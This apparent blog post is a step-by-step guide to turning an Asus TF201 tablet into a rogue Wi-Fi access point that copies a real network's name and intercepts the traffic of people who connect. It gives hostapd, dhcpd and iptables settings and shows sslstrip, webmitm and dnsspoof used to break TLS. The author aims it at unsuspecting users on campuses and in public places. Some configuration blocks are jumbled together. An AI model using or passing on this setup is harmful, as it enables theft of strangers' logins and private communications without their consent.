turn your TF201 into a wifi "bridge".... and sniff all data that pass though :)
here you are my sample use:
in my campus we have 2 main WiFi access points. one is protected with WPA-EAP, the other is OPEN but require a valid login for surfing.
AP--------TF201------TARGETS
the first thing to do is building the kernel module for your 2nd wifi card ( mine is ath9k_htc ).
just download the kernel sources and sign your wifi dongle driver as <M> in the menuconfig.
after this we have to update the kernel ( maybe your changes affects something else in kernel ).
if you are using kernel_chooser replace the kernel you used for boot before ( mine was in /media/data/boot/zImage ). remember to make a backup before.
reboot.
if you plug your wifi dongle after the booting process you should see it's own modules loaded.
for check this gives a "lsmod" command.
now we have 2 interfaces, we need some extra software for make our TF201 act like a router.
layman -a pentoo
emerge -av --autounmask-write iptables dhcp dsniff hostapd sslstrip
i've emerged all these software fines. just unmask them.
now we have to configure them.
let's say that your client interface ( the one connected to the AP) is wlan0 and the server interface ( the one where we will accepting the targets connections ) is wlan2.
we will always use the usb dongle as server interface because the internal bcm4329 cannot operates as monitor.
in this example i will set the SSID of our dongle to "AndroidAP", in the real life i set this to the AP name ( AndroidAP will works great too ;) )
/etc/hostapd/hostapd.conf:
ssid=AndroidAP/etc/dhcp/dhcpd.conf:
interface=wlan2
auth_algs=1
channel=7
driver=nl80211
hw_mode=g
logger_stdout=-1
logger_stdout_level=2
max_num_sta=5
macaddr_acl=0
default-lease-time 600;let's start these 2 services:
max-lease-time 7200;
option routers 192.168.50.1;
option domain-name-servers 192.168.50.1, 192.168.50.1;
subnet 192.168.50.0 netmask 255.255.255.0
{
pool
{
max-lease-time 600;
range 192.168.50.10 192.168.50.50;
option routers 192.168.50.1;
option domain-name-servers 192.168.50.1, 192.168.50.1;
allow unknown-clients;
}
}
/etc/init.d/hostapd startnow we should see the AndroidAP opened access point from our smartphone.
/etc/init.d/dhcpd start
the first time you run dhcpd it yells at you because the server interface doesn't have an ip address assigned.
look at the dhcpd.conf file and find the ip following the "option routers" string.
in this example it will be 192.168.50.1, so,
ifconfig wlan2 192.168.50.1now we have to forward packets from the server interface to the client one.
/etc/init.d/dhcpd start
echo 1 > /proc/sys/net/ipv4/ip_forwardwe now have 2 choices:
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -A FORWARD -i $IF_CLIENT -o $IF_SERVER -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -o $IF_CLIENT -i $IF_SERVER -j ACCEPT
- use webmitm: this program will use a self-signed certificate. most common web-browsers will show a warning about that, but if user accept this, every SSL connection will be handled by us. thus to let the user think to making a secure connection....and it's true....but with us :)
- use sslstrip: this program will talk on SSL with the remote hosts and will show all the results as unsecured web pages. it works only if user start a connection on the 80 port.
your choice depends from your environment. if you are in a university campus, with IT engineers around, most of them will be scared of a SSL warning. if you are on a public area like fast-foods, bars and so on.., most people will just press "Next" "I Agree" "OK" "let me surf!" :)
surely webmitm it's the preferred choice since it works also on connection started over the SSL protocol. but remember that modern web-browsers will show a big warning ( not IE lol )
if you choose sslstrip you have to route all packets sent to the 80 port to the 10000 one.
the 10000 port is the default for sslstrip, you can change this if you wish.
iptables -t nat -A PREROUTING -i wlan2 -p tcp --destionation-port 80 -j REDIRECT --to-port 10000
now start sslstrip in another shell
sslstrip
the last thing we have to setup it's the domain name resolver for the targets.
in this case we will route all dns queries to mom google.
iptables -t nat -I PREROUTING -i $IF_SERVER -p udp --destination-port 53 -j DNAT --to 8.8.8.8
Done!
if you choose webmitm we have to tells to our targets that the whole internet it's hosted on our TF201. launch in 2 separate shells:
webmitm
dnsspoof -i wlan2
Done!
now you can sniff over the server interface :)
here you are a gentoo specific init script that will do all this automatically: http://pastebin.com/6ZpQrJEj
No comments:
Post a Comment